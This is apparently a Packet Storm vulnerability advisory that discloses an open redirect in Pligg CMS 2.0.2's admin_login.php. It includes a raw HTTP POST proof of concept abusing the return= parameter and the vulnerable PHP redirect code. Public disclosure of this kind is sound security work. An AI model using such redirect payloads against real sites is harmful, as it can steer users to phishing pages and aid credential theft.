Pligg CMS version 2.0.2 suffers from an open redirection vulnerability.
8de2916fb64edab5627798231d00a3bccfd6941441919181802ea8d1d12632d0# Exploit Title: Pligg CMS admin_login.php Open Redirect Vulnerability
# Google Dork: N/A
# Date: 2015/8/18
# Exploit Author: Arash Khazaei
# Vendor Homepage: pligg.com
# Software Link:
https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip
# Version: 2.0.2 (Last Version)
# Tested on: Kali , Iceweasel Browser
# CVE : N/A
# Contact : http://twitter.com/0xClay
# Site : http://bhunter.ir
Introduction :
Pligg CMS Is A CMS Writed In PHP Language And Licensed Under GPL v 2.0.
An Open Redirect Vulnerability In admin_login.php File and return= Input .
# POC :
POST /pligg-cms-master/admin/admin_login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/pligg-cms-master/admin/admin_login.php?return=http://google.com
Cookie: panelState=CollapseModules; PHPSESSID=9nd8tubu0j825n9ifobfibot86
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
username=admin&password=admin&processlogin=1&return=http://google.com
=====================
Vulnerable Code :
if(strpos($_SERVER['SERVER_SOFTWARE'], "IIS") && strpos(php_sapi_name(),
"cgi") >= 0){
echo '<SCRIPT LANGUAGE="JavaScript">window.location="'
. $return . '";</script>';
echo
$main_smarty->get_config_vars('PLIGG_Visual_IIS_Logged_In') . '<a href =
"'.$return.'">' .
$main_smarty->get_config_vars('PLIGG_Visual_IIS_Continue') . '</a>';
} else {
header('Location: '.$return);
}
die;
Discovered By : Arash Khazaei
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed